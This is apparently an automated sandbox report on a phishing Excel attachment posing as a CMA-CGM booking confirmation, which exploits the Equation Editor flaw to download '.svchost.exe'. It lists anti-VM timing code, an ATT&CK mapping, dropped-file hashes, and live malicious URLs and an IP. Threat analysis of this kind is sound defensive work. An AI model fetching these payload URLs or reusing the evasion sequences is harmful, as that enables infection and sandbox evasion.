    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
    Source: CMA-CGM BOOKING CONFIRMATION.xlsxStream path 'EncryptedPackage' entropy: 7.99856683358 (max. 8.0)

    Malware Analysis System Evasion:

    barindex
    Contains functionality to detect hardware virtualization (CPUID execution measurement)Show sources
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B5852
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B78B2
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B28E2
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B513E
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B4128
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B3920
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B423F
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B4277
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B4263
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B5A46
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B5A84
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B2AFD
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B2AD6
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B33A7
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B2470
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B045E
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B3C4D
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B7CA5
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B7488
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B8DB4
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B7EFC
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B46E4
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B1FD9
    Detected RDTSC dummy instruction sequence (likely for instruction hammering)Show sources
    Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000003B0182 second address: 00000000003B0182 instructions:
    Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000003B6E61 second address: 00000000003B6E61 instructions:
    Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000003B01B2 second address: 00000000003B01B2 instructions:
    Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000003B78FC second address: 00000000003B790A instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a pushad 0x0000000b lfence 0x0000000e rdtsc
    Tries to detect virtualization through RDTSC time measurementsShow sources
    Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000003B0182 second address: 00000000003B0182 instructions:
    Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000003B6E61 second address: 00000000003B6E61 instructions:
    Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000003B01B2 second address: 00000000003B01B2 instructions:
    Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000003B78FC second address: 00000000003B790A instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a pushad 0x0000000b lfence 0x0000000e rdtsc
    Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000003B790A second address: 00000000003B79F6 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b mov esi, DCAAA67Fh 0x00000010 test dl, dl 0x00000012 xor esi, F2CCAB26h 0x00000018 test edx, edx 0x0000001a sub esi, 536EBD65h 0x00000020 test bh, ch 0x00000022 xor esi, DAF7BFF4h 0x00000028 test ecx, ecx 0x0000002a test bx, cx 0x0000002d add esi, 00001000h 0x00000033 test bx, ax 0x00000036 cmp cl, dl 0x00000038 cmp bx, dx 0x0000003b mov dword ptr [ebp+000001F8h], FC14852Ch 0x00000045 test ebx, ecx 0x00000047 xor dword ptr [ebp+000001F8h], 83A94D75h 0x00000051 xor dword ptr [ebp+000001F8h], AA3F6E81h 0x0000005b cmp ah, 00000015h 0x0000005e sub dword ptr [ebp+000001F8h], D581B6D8h 0x00000068 cmp esi, dword ptr [ebp+000001F8h] 0x0000006e je 00007F2C903B46EAh 0x00000074 mov dword ptr [ebp+00000204h], 67BCF0E4h 0x0000007e xor dword ptr [ebp+00000204h], E457B680h 0x00000088 xor dword ptr [ebp+00000204h], E04C2F31h 0x00000092 xor dword ptr [ebp+00000204h], 1C589955h 0x0000009c cmp ch, dh 0x0000009e cmp esi, dword ptr [ebp+00000204h] 0x000000a4 je 00007F2C903B46B4h 0x000000aa test cl, dl 0x000000ac mov dword ptr [ebp+00000246h], eax 0x000000b2 mov eax, 03147A97h 0x000000b7 cmp ecx, ecx 0x000000b9 xor eax, 4F08C75Bh 0x000000be cmp cl, al 0x000000c0 sub eax, 1A91E3C1h 0x000000c5 sub eax, 318ADA0Bh 0x000000ca push eax 0x000000cb mov eax, dword ptr [ebp+00000246h] 0x000000d1 cmp bh, ah 0x000000d3 push 25819736h 0x000000d8 sub dword ptr [esp], 3CB652F7h 0x000000df xor dword ptr [esp], 3AF83707h 0x000000e6 pushad 0x000000e7 mov ebx, 000000DBh 0x000000ec rdtsc
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B883C rdtsc
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1664Thread sleep time: -60000s >= -30000s

    Anti Debugging:

    barindex
    Potentially malicious time measurement code foundShow sources
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B5852 Start: 003B4BE7 End: 003B480D
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B513E Start: 003B4BE7 End: 003B480D
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B4128 Start: 003B4BE7 End: 003B480D
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B423F Start: 003B4BE7 End: 003B480D
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B4277 Start: 003B4BE7 End: 003B480D
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B4263 Start: 003B4BE7 End: 003B480D
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B5A46 Start: 003B5BED End: 003B480D
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B33A7 Start: 003B4BE7 End: 003B480D
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B045E Start: 003B4BE7 End: 003B480D
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B7CA5 Start: 003B4BE7 End: 003B480D
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B7488 Start: 003B4BE7 End: 003B480D
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B8DB4 Start: 003B4BE7 End: 003B480D
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B46E4 Start: 003B4BE7 End: 003B480D
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B1FD9 Start: 003B4BE7 End: 003B480D
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B883C rdtsc
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B28E2 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B5201 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B7365 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B33A7 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B33EC mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B348A mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B6D92 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B7EFC mov eax, dword ptr fs:[00000030h]
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
    Source: vbc.exe, 00000006.00000002.2355005736.0000000000940000.00000002.00000001.sdmpBinary or memory string: Program Manager
    Source: vbc.exe, 00000006.00000002.2355005736.0000000000940000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
    Source: vbc.exe, 00000006.00000002.2355005736.0000000000940000.00000002.00000001.sdmpBinary or memory string: !Progman
    Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsExploitation for Client Execution12Path InterceptionProcess Injection12Masquerading111OS Credential DumpingSecurity Software Discovery31Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsExtra Window Memory Injection1Disable or Modify Tools1LSASS MemoryVirtualization/Sandbox Evasion1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion1Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection12NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol121SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information11LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonExtra Window Memory Injection1Cached Domain CredentialsSystem Information Discovery33VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    CMA-CGM BOOKING CONFIRMATION.xlsx28%ReversingLabsDocument-OLE.Exploit.CVE-2018-0802

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    https://kinmirai.org/wp-content/bin_QVwo0%Avira URL Cloudsafe
    http://180.214.239.39/disk/.svchost.exe0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    No contacted domains info

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    https://kinmirai.org/wp-content/bin_QVwotrue
    • Avira URL Cloud: safe
    unknown
    http://180.214.239.39/disk/.svchost.exetrue
    • Avira URL Cloud: safe
    unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://www.day.com/dam/1.03B0A6367.emf.0.drfalse
      high

      Contacted IPs

      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs

      Public

      IPDomainCountryFlagASNASN NameMalicious
      180.214.239.39
      unknownViet Nam
      135905VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVNtrue

      General Information

      Joe Sandbox Version:33.0.0 White Diamond
      Analysis ID:450863
      Start date:19.07.2021
      Start time:19:38:13
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 6m 10s
      Hypervisor based Inspection enabled:false
      Report type:light
      Sample file name:CMA-CGM BOOKING CONFIRMATION.xlsx
      Cookbook file name:defaultwindowsofficecookbook.jbs
      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
      Number of analysed new started processes analysed:5
      Number of new started drivers analysed:2
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal100.troj.expl.evad.winXLSX@4/17@0/1
      EGA Information:Failed
      HDC Information:Failed
      HCA Information:
      • Successful, ratio: 53%
      • Number of executed functions: 0
      • Number of non-executed functions: 0
      Cookbook Comments:
      • Adjust boot time
      • Enable AMSI
      • Found application associated with file extension: .xlsx
      • Found Word or Excel or PowerPoint or XPS Viewer
      • Attach to Office via COM
      • Scroll down
      • Close Viewer
      Warnings:
      Show All
      • Exclude process from analysis (whitelisted): dllhost.exe, vga.dll
      • TCP Packets have been reduced to 100
      • Report size getting too big, too many NtCreateFile calls found.
      • Report size getting too big, too many NtQueryAttributesFile calls found.

      Simulations

      Behavior and APIs

      TimeTypeDescription
      19:39:03API Interceptor65x Sleep call for process: EQNEDT32.EXE modified

      Joe Sandbox View / Context

      IPs

      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      180.214.239.39MTIR21487610_0062180102_20210714081247.PDF.xlsxGet hashmaliciousBrowse
      • 180.214.239.39/user/.svchost.exe
      MTIR21487610_0062180102_20210714081247.PDF.xlsxGet hashmaliciousBrowse
      • 180.214.239.39/cpu/.svchost.exe
      Booking Confirmation.xlsxGet hashmaliciousBrowse
      • 180.214.239.39/port/.svchost.exe
      6306093940.xlsxGet hashmaliciousBrowse
      • 180.214.239.39/ssh/.svchost.exe
      6306093940.xlsxGet hashmaliciousBrowse
      • 180.214.239.39/mssn/.svchost.exe

      Domains

      No context

      ASN

      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVNSO-19844 EIDCO.ppamGet hashmaliciousBrowse
      • 103.141.137.204
      qHuGyYm6MV.exeGet hashmaliciousBrowse
      • 103.133.104.146
      INV 2429.xlsxGet hashmaliciousBrowse
      • 180.214.236.151
      PROFORMA_INVOICE.xlsxGet hashmaliciousBrowse
      • 103.140.250.43
      MTIR21487610_0062180102_20210714081247.PDF.xlsxGet hashmaliciousBrowse
      • 180.214.239.39
      kung.xlsxGet hashmaliciousBrowse
      • 103.140.250.43
      kung.xlsxGet hashmaliciousBrowse
      • 103.140.250.43
      SYHPpy5x6D.exeGet hashmaliciousBrowse
      • 103.133.104.146
      Swift.xlsxGet hashmaliciousBrowse
      • 103.133.104.146
      S&P-RFQ #2004668.xlsxGet hashmaliciousBrowse
      • 180.214.236.151
      NEW ORDER.xlsxGet hashmaliciousBrowse
      • 103.140.250.43
      MTIR21487610_0062180102_20210714081247.PDF.xlsxGet hashmaliciousBrowse
      • 180.214.239.39
      Booking Confirmation.xlsxGet hashmaliciousBrowse
      • 180.214.239.39
      kung.xlsxGet hashmaliciousBrowse
      • 103.140.250.43
      TT PAYMENT CONFIRMATION.xlsxGet hashmaliciousBrowse
      • 103.89.90.94
      lokibot.docxGet hashmaliciousBrowse
      • 103.133.106.144
      payment advice.exeGet hashmaliciousBrowse
      • 103.89.91.38
      PROFORMA INVOICE.xlsxGet hashmaliciousBrowse
      • 103.140.250.43
      INVM220210055600512.xlsxGet hashmaliciousBrowse
      • 103.89.90.94
      xP0clPWhrv.exeGet hashmaliciousBrowse
      • 103.133.106.117

      JA3 Fingerprints

      No context

      Dropped Files

      No context

      Created / dropped Files

      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe
      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
      Category:downloaded
      Size (bytes):271464
      Entropy (8bit):4.804431914533398
      Encrypted:false
      SSDEEP:1536:d/k1xdvMuWnLtmBcSa9O/C0UzIY+SpAkaYQryC7AfT/k1xD:5ktvMu8GcSaw/RQ80fDkz
      MD5:08730CDD286A4C9D46B38BB6545AC311
      SHA1:001BB7B5B8D63E505661D7E4A178D08ABE6BBAD7
      SHA-256:CB2A2537987E45C8461D40A0EC6C24215920519257134DB91DD1369FF5ABF342
      SHA-512:A6531EB4709AF3E1270F1C4434D9ABC87097E9F8D38C4BA5DC0ED61D7F469552DE7259F638728FE71297D3748823064F75728E71DF3531657A5AEB1952F412D8
      Malicious:true
      Reputation:low
      IE Cache URL:http://180.214.239.39/disk/.svchost.exe
      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........y....................................Rich............PE..L.....fI.................`..........<........p....@.................................^i.......................................d..(..................P.......................................................(... ....................................text....Y.......`.................. ..`.data........p.......p..............@....rsrc..............................@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\23D48948.jpeg
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
      Category:dropped
      Size (bytes):85020
      Entropy (8bit):7.2472785111025875
      Encrypted:false
      SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
      MD5:738BDB90A9D8929A5FB2D06775F3336F
      SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
      SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
      SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
      Malicious:false
      Reputation:moderate, very likely benign file
      Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\31DE0BA3.png
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PNG image data, 816 x 552, 8-bit/color RGB, non-interlaced
      Category:dropped
      Size (bytes):94963
      Entropy (8bit):7.9700481154985985
      Encrypted:false
      SSDEEP:1536:U75cCbvD0PYFuxgYx30CS9ITdjq/DnjKqLqA/cx8zJjCKouoRwWH/EXXXXXXXXXB:kAPVZZ+oq/3TLPcx8zJjCXaWfEXXXXXB
      MD5:17EC925977BED2836071429D7B476809
      SHA1:7A176027FFD13AA407EF29EA42C8DDF7F0CC5D5C
      SHA-256:83905385F5DF8E961CE87C8C4F5E2F470CBA3198A6C1ABB0258218D932DDF2E9
      SHA-512:3E63730BC8FFEAD4A57854FEA1F1F137F52683734B68003480030DA77379EF6347115840280B63B75D61569B2F4F307B832241E3CEC23AD27A771F7B16D199A2
      Malicious:false
      Reputation:moderate, very likely benign file
      Preview: .PNG........IHDR...0...(.....9.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....e.z...b.$..P ..^.Jd..8.........c..c..mF.&......F...[....Zk...>.g....{...U.T.S.'.O......eS`S`S`S`S`S`S`S..Q.{....._...?...g7.6.6.6.6.6.6.6......$......................!..c.?.).).).).).)..).=...+.....................}................x.....O.M.M.M.M.M.M.M..M...>....o.l.l.l.l.l..z.l@...&.................@.....C................+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1........................]............x....e..n............+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1..................?.....b..o.l.l.l.l.l.l.|`.l@...`.~S`S`S`S`S`S`S`..=.6.6.6.6.6.6.6.>0.6 ....?.).).).).).).).......................}..................l.M.M.M.M.M.M.M..L...>....o.l.l.l.l.l.l.l@.....................d.x...7.6.6.6.6.6.6.6 .s`S`S`S`S`S`S`S..S`...<...
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3B0A6367.emf
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
      Category:dropped
      Size (bytes):653280
      Entropy (8bit):2.8986527136471305
      Encrypted:false
      SSDEEP:3072:v34UL0tS6WB0JOqFVY5QcARI/McGdAT9kRLFdtSyQu50yknG/qc+5:v4UcLe0JOqQQZR8MDdATCR3tSqjqcS
      MD5:686190A5D85E69ED0BBC8EBEE5C83031
      SHA1:F804655430E23D11C2B0EEA04D4BEB8906E846DB
      SHA-256:E9CD452C9AD7CB24C2B7DA5BA5F89C7BFFFDC1322969DB710B1517A7602145E4
      SHA-512:4118554C5C9FCBABF893B729FE88E228B958BDD59E4EBDA97221C087345CC96F1F2CFC03B38218E0E890C2725378642A8E4B48E16CCC5B85FBAE4BC499FEDFC9
      Malicious:false
      Reputation:low
      Preview: ....l...........................m>...!.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i.....................................................PQ$.......-zYQ.@..%...............h........N.Rh...`...........L....N.Rh...`... ....yYQ`...h... ............zYQ........................................%...X...%...7...................{$..................C.a.l.i.b.r.i...............X...`.................ovdv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@............L.......................P... ...6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\887DE696.png
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PNG image data, 816 x 552, 8-bit/color RGB, non-interlaced
      Category:dropped
      Size (bytes):94963
      Entropy (8bit):7.9700481154985985
      Encrypted:false
      SSDEEP:1536:U75cCbvD0PYFuxgYx30CS9ITdjq/DnjKqLqA/cx8zJjCKouoRwWH/EXXXXXXXXXB:kAPVZZ+oq/3TLPcx8zJjCXaWfEXXXXXB
      MD5:17EC925977BED2836071429D7B476809
      SHA1:7A176027FFD13AA407EF29EA42C8DDF7F0CC5D5C
      SHA-256:83905385F5DF8E961CE87C8C4F5E2F470CBA3198A6C1ABB0258218D932DDF2E9
      SHA-512:3E63730BC8FFEAD4A57854FEA1F1F137F52683734B68003480030DA77379EF6347115840280B63B75D61569B2F4F307B832241E3CEC23AD27A771F7B16D199A2
      Malicious:false
      Reputation:moderate, very likely benign file
      Preview: .PNG........IHDR...0...(.....9.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....e.z...b.$..P ..^.Jd..8.........c..c..mF.&......F...[....Zk...>.g....{...U.T.S.'.O......eS`S`S`S`S`S`S`S..Q.{....._...?...g7.6.6.6.6.6.6.6......$......................!..c.?.).).).).).)..).=...+.....................}................x.....O.M.M.M.M.M.M.M..M...>....o.l.l.l.l.l..z.l@...&.................@.....C................+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1........................]............x....e..n............+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1..................?.....b..o.l.l.l.l.l.l.|`.l@...`.~S`S`S`S`S`S`S`..=.6.6.6.6.6.6.6.>0.6 ....?.).).).).).).).......................}..................l.M.M.M.M.M.M.M..L...>....o.l.l.l.l.l.l.l@.....................d.x...7.6.6.6.6.6.6.6 .s`S`S`S`S`S`S`S..S`...<...
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9D9EA3AA.jpeg
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:[TIFF image data, big-endian, direntries=4], baseline, precision 8, 654x513, frames 3
      Category:dropped
      Size (bytes):62140
      Entropy (8bit):7.529847875703774
      Encrypted:false
      SSDEEP:1536:S30U+TLdCuTO/G6VepVUxKHu9CongJvJsg:vCTbVKVzHu9ConWvJF
      MD5:722C1BE1697CFCEAE7BDEFB463265578
      SHA1:7D300A2BAB951B475477FAA308E4160C67AD93A9
      SHA-256:2EE4908690748F50B261A796E6932FBCA10A79D83C316A9CEE92726CA4453DAE
      SHA-512:2F38E0581397025674FA40B20E73B32D26F43851BE9A8DFA0B1655795CDC476A5171249D1D8D383693775ED9F132FA6BB56D92A8949191738AF05DA053C4E561
      Malicious:false
      Reputation:moderate, very likely benign file
      Preview: ......JFIF.....`.`......Exif..MM.*.......;.........J.i.........R.......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B536090D.jpeg
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
      Category:dropped
      Size (bytes):85020
      Entropy (8bit):7.2472785111025875
      Encrypted:false
      SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
      MD5:738BDB90A9D8929A5FB2D06775F3336F
      SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
      SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
      SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
      Malicious:false
      Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D831163C.emf
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
      Category:dropped
      Size (bytes):7608
      Entropy (8bit):5.074885370517679
      Encrypted:false
      SSDEEP:96:+SBNUL6BGj/MQU8DbwiMOtWmVz76F2MqdTfOYL/xRp7uGkmrI:5BNkjU+H3tWa6WdTfOYLpR8d
      MD5:FA5C58C789168CBA88CE40BF2F2D0B73
      SHA1:2D4DC13F61B62101B0913FE65D94B90DF1E26CC8
      SHA-256:81449BAA21CD4441530A4D9DC0141C3BA640E93F25F894DF29E715227018B6A4
      SHA-512:492D107DC7D27FEC1AA5425EE6E24DD069130402CA783138B77AF407F2C3577955B41CD40EED9DEDD419F91C700CB925DA8431D198E12E01E403F8495D82B6DC
      Malicious:false
      Preview: ....l...,...........<................... EMF................................8...X....................?..................................C...R...p...................................S.e.g.o.e. .U.I...................................................o.6.).X...0...d.............................q....\.............<......q........6.u...q....`..qP.o.$y.w(..................w....$.......d.......t....^ q.....^ q.~..(.....9.....-...$....<.w................<..v.Znv....X.jp....P.o.......................ovdv......%...................................r...................'...........(...(..................?...........?................l...4...........(...(...(...(...(..... .............................................................................................................................................................................................................................................................................................................................................
